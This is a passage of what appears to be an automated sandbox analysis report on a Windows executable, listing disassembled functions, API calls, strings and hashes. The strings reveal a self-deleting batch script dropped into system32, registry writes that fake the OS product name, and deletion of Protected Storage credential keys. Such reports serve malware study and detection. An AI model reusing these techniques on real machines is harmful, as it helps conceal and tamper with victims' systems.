                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                • API String ID: 780041395-483790700
                                • Opcode ID: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                • Instruction ID: 8cf04242b056ed2888822f3ee261883fc83cb0ac3b597c26b6eb5f4152f102d6
                                • Opcode Fuzzy Hash: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                • Instruction Fuzzy Hash: 715186B1E40219AEDF109FE5DC89BBFBBB8EB44315F10003BE905E3251D67C99448BA5
                                Function 00439E56 Relevance: 37.1, APIs: 4, Strings: 17, Instructions: 311fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00455F5B: __EH_prolog.LIBCMT ref: 00455F60
                                  • Part of subcall function 00455F5B: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                  • Part of subcall function 00455F5B: LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                  • Part of subcall function 00455F5B: LockResource.KERNEL32(00000000), ref: 00455FB2
                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00439E9D
                                • CopyFileA.KERNEL32(?,?), ref: 00439EF1
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0043A20D
                                  • Part of subcall function 0045A8A7: __EH_prolog.LIBCMT ref: 0045A8AC
                                • DeleteFileA.KERNEL32(?), ref: 0043A26B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FileResource$H_prolog$CopyDeleteExecuteFindLoadLockModuleNameShell
                                • String ID: del $ exit$"$" goto loop$:loop$@echo off$There are %d times remain to try!$There are no times remain to try, you must sign to use it!$\system32\winbws.bat$\system32\winsys.ini$\system32\winsys.ini $\system32\winsys.ini "$copy $del "$if exist "$open$start " " "
                                • API String ID: 2304847132-3863200934
                                • Opcode ID: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                • Instruction ID: fcd660b851029791eff8e37d441e36e2141ad544d5897bee44c52de96331267e
                                • Opcode Fuzzy Hash: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                • Instruction Fuzzy Hash: 1CC17D750083819BC314EB66C856FDFBBE8AF95308F40491FF589521D2EBB89508CB6B
                                Function 00404F00 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 208registryCOMMON
                                Download Yara Rule
                                APIs
                                • _rand.LIBCMT ref: 00405041
                                • RegOpenKeyExA.KERNEL32 ref: 0040507B
                                • _strncpy.LIBCMT ref: 00405118
                                • RegSetValueExA.KERNEL32(?,ProductName,00000000,00000007,?,?), ref: 0040514A
                                • RegCloseKey.KERNEL32(?), ref: 00405155
                                • GetParent.USER32(?), ref: 0040515F
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CloseMessageOpenParentValue_rand_strncpy
                                • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 2000 Professional$Windows 3.1$Windows 95$Windows 98$Windows Me$Windows NT 3.5$Windows NT 4.0$Windows Server 2003$Windows Server 2008$Windows Sever 2000$Windows Vista$Windows XP Home Edition$Windows XP Professional
                                • API String ID: 259016058-1574738584
                                • Opcode ID: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                • Instruction ID: 6947d528358f3abf9f61610de5f967e2356a8112bdea7af398e2d87693c0fe26
                                • Opcode Fuzzy Hash: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                • Instruction Fuzzy Hash: 858192712087019BC314DF28D996F5BB3A4EFC4719F104A1EF4966B2D2DA78A80DCB67
                                Function 0043AEB0 Relevance: 33.6, APIs: 8, Strings: 11, Instructions: 378windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMenu.USER32(?,00000000), ref: 0043AEE8
                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 0043AF51
                                • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 0043AF5C
                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 0043AF9C
                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 0043AFAD
                                • GetVersionExA.KERNEL32 ref: 0043B067
                                • SendMessageA.USER32(?,00001309,00000000,00000000), ref: 0043B147
                                • GetClientRect.USER32(?,?), ref: 0043B1E6
                                  • Part of subcall function 004021B0: FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                  • Part of subcall function 00459A51: SetWindowPos.USER32(?,000000FF,?,?,?,?,8rE,?,00457238,00000000,?,?,000000FF,000000FF,00000015), ref: 00459A77
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MenuMessageSend$Append$ClientFindRectResourceSystemVersionWindow
                                • String ID: (TRIAL)$Disk$MAC Addr$Name$OS:WIN2000$OS:WIN95$OS:WIN98$OS:WINNT$System1$System2$Unknown OS!!
                                • API String ID: 2761810206-2538934281
                                • Opcode ID: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                • Instruction ID: 28d43a913e9cc64de2e3d69b6c2acafb16c2cec924d16276a36815c0c13835ca
                                • Opcode Fuzzy Hash: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                • Instruction Fuzzy Hash: 55E1AB70344701ABD714CB24CC99F6BB7A5BB88704F148A1DF6999B3C2DB74E806CB99
                                Function 004588B4 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 004588E9
                                • GetClassLongA.USER32(?,000000E6), ref: 0045892E
                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,Function_0005EC43), ref: 0045895A
                                • lstrcmpiA.KERNEL32(?,ime), ref: 00458969
                                • SetWindowLongA.USER32(?,000000FC,Function_00057E4D), ref: 004589A3
                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 00458AA7
                                • UnhookWindowsHookEx.USER32(?), ref: 00458AB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                • String ID: #32768$AfxOldWndProc423$ime
                                • API String ID: 3204395069-4034971020
                                • Opcode ID: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                • Instruction ID: c31b28fc186431055d90b645be9d6e60fd1338abb9f4e3e990662555ef10b02e
                                • Opcode Fuzzy Hash: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                • Instruction Fuzzy Hash: 7851A131504215ABDF11AF50DC48B9E3B75AF04362F14816BFD18E62A2DF789E44CB99
                                Function 00436B70 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 203registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00436C9B
                                • RegQueryValueExA.KERNEL32(?,CSDVersion,00000000,00000000,?,80000002), ref: 00436CBB
                                • RegQueryValueExA.KERNEL32(?,BuildLab,00000000,00000000,?,?), ref: 00436CDB
                                • RegQueryValueExA.KERNEL32(?,RegisteredOwner,00000000,00000000,?,?), ref: 00436CFB
                                • RegQueryValueExA.KERNEL32(?,RegisteredOrganization,00000000,00000000,?,00000000), ref: 00436D1B
                                • RegQueryValueExA.KERNEL32(?,ProductId,00000000,00000000,?,?), ref: 00436D3B
                                • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00436DE6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: QueryValue$CloseOpen
                                • String ID: BuildLab$CSDVersion$ProductId$ProductName$RegisteredOrganization$RegisteredOwner$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1586453840-3514816458
                                • Opcode ID: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                • Instruction ID: e5fba20e6ff125bba2283bc3006cd0e19e9b6b9096beb30a0a4ca32c458e7ecf
                                • Opcode Fuzzy Hash: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                • Instruction Fuzzy Hash: 55718D71108741AFD724DF14CC55F9BB3E8EBC8714F008A2EB199971D1EBB4A509CB96
                                Function 0045708A Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 171windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                • GetParent.USER32(?), ref: 004570B5
                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004570D8
                                • GetWindowRect.USER32(?,?), ref: 004570F1
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00457104
                                • CopyRect.USER32(?,?), ref: 00457151
                                • CopyRect.USER32(?,?), ref: 0045715B
                                • GetWindowRect.USER32(00000000,?), ref: 00457164
                                  • Part of subcall function 0043D078: MonitorFromWindow.USER32(00000002,00000000), ref: 0043D08D
                                  • Part of subcall function 0043D0E3: GetMonitorInfoA.USER32(00000002,00000000), ref: 0043D0F8
                                • CopyRect.USER32(?,?), ref: 00457180
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                • String ID: ($@
                                • API String ID: 1450647913-1311469180
                                • Opcode ID: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                • Instruction ID: f9aac2a8b0235c18acd1f2551889d6b630a400b2f47a5db2de4d24cadace4ab8
                                • Opcode Fuzzy Hash: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                • Instruction Fuzzy Hash: 19519471904608AFCB10DBB8DC85EEEBBB9AF44311F144166F901F7281EA34EC098B68
                                Function 00401400 Relevance: 22.6, APIs: 15, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 0040140A
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00401411
                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000), ref: 0040142A
                                • GetLastError.KERNEL32 ref: 00401430
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401455
                                • HeapAlloc.KERNEL32(00000000), ref: 0040145E
                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00401474
                                • GetLengthSid.ADVAPI32 ref: 00401481
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040148C
                                • HeapAlloc.KERNEL32(00000000), ref: 0040148F
                                • CopySid.ADVAPI32(00000000,00000000), ref: 004014A1
                                • GetProcessHeap.KERNEL32(00000000), ref: 004014B0
                                • HeapFree.KERNEL32(00000000), ref: 004014B3
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014C8
                                • HeapFree.KERNEL32(00000000), ref: 004014CB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Heap$Process$Token$AllocFreeInformation$CopyCurrentErrorLastLengthOpen
                                • String ID:
                                • API String ID: 4067104921-0
                                • Opcode ID: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                • Instruction ID: be5dff9eabe861d766ec5fd4dd401e50df9c5d4daca625da32615f9425814a56
                                • Opcode Fuzzy Hash: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                • Instruction Fuzzy Hash: 92216771200305ABD720AB71EC89F6B77ACEB84B55F004439F944C6290EAB4DC45C7BA
                                Function 0042B660 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 327comCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • CoCreateInstance.OLE32 ref: 0042B6F9
                                • VariantInit.OLEAUT32(?), ref: 0042B835
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateErrorInitInstanceLastMessageOpenVariant
                                • String ID: Couldn't connect to service$Domain$Instantiation of IWbemLocator failed$NV Hostname$Query failed$SELECT * FROM Win32_ComputerSystem WHERE Name="$System\CurrentControlSet\Services\Tcpip\Parameters$WQL$root\cimv2
                                • API String ID: 3264900959-945420370
                                • Opcode ID: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                • Instruction ID: e19c71c077be67fb10b829806df480d9e94b8e638e4d3a62bd1a267aacc894f3
                                • Opcode Fuzzy Hash: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                • Instruction Fuzzy Hash: AFC191B02083809FD310DB69C885F6FB7E9AFC4318F544A1EF19987292D7789849CB5B
                                Function 00404C50 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00401370: GetVersionExA.KERNEL32 ref: 004013AC
                                  • Part of subcall function 00401370: GetVersionExA.KERNEL32(?), ref: 004013BF
                                • SHDeleteKeyA.SHLWAPI(80000001,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DCC
                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DDD
                                • HeapFree.KERNEL32(00000000), ref: 00404DE4
                                  • Part of subcall function 004012E0: GetVersionExA.KERNEL32 ref: 0040131C
                                  • Part of subcall function 004012E0: GetVersionExA.KERNEL32(?), ref: 0040132F
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00404E12
                                • HeapFree.KERNEL32(00000000), ref: 00404E19
                                  • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00040000,?), ref: 00401894
                                  • Part of subcall function 00401860: RegSetKeySecurity.ADVAPI32(?,00000004,?), ref: 004018AA
                                  • Part of subcall function 00401860: RegCloseKey.ADVAPI32(?), ref: 004018C9
                                  • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004018E0
                                  • Part of subcall function 00401860: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0040190E
                                  • Part of subcall function 00401860: RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105), ref: 0040194C
                                • GetUserNameA.ADVAPI32(?,?), ref: 00404E58
                                • SHDeleteKeyA.SHLWAPI(80000002,?,\Data\e161255a-37c3-11d2-bcaa-00c04fd929db,0000002A,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404EAD
                                Strings
                                • \e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404DA0
                                • Software\Microsoft\Protected Storage System Provider\, xrefs: 00404CFD, 00404E60
                                • \Data, xrefs: 00404D7B
                                • \Data\e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404E95
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: HeapVersion$DeleteFreeOpenProcess$CloseEnumInfoNameQuerySecurityUser
                                • String ID: Software\Microsoft\Protected Storage System Provider\$\Data$\Data\e161255a-37c3-11d2-bcaa-00c04fd929db$\e161255a-37c3-11d2-bcaa-00c04fd929db
                                • API String ID: 76489323-2944829630
                                • Opcode ID: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                • Instruction ID: 77fd4bca92202b6cf2dab01a516e43f9aa8c3c24651323e1d72e56862fef26ee
                                • Opcode Fuzzy Hash: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                • Instruction Fuzzy Hash: CE7180712043019FD314EF61C859FABB7A8FBC4744F04492DF545972E1EBB8A909CB9A
                                Function 00455F5B Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00455F60
                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                • LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                  • Part of subcall function 00457843: UnhookWindowsHookEx.USER32(?), ref: 00457868
                                • LockResource.KERNEL32(00000000), ref: 00455FB2
                                • GetDesktopWindow.USER32 ref: 00455FDF
                                • IsWindowEnabled.USER32(00000000), ref: 00455FED
                                • EnableWindow.USER32(00000000,00000000), ref: 00455FFC
                                • EnableWindow.USER32(00000000,00000001), ref: 0045608B
                                • GetActiveWindow.USER32 ref: 00456096
                                • SetActiveWindow.USER32(00000000), ref: 004560A4
                                • FreeResource.KERNEL32(00000000), ref: 004560C0
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                • String ID:
                                • API String ID: 833315621-0
                                • Opcode ID: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                • Instruction ID: 2a4ce187d4919ba72b0d1d9773206bd8c7ff34da06ea6e71cf98739f74d54366
                                • Opcode Fuzzy Hash: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                • Instruction Fuzzy Hash: 09418331500705DBCF20AFA5D94976FBBB5AF0471AF50042FE902622E2DBB85949CB5A
                                Function 00435159 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 273windowregistryCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                Strings
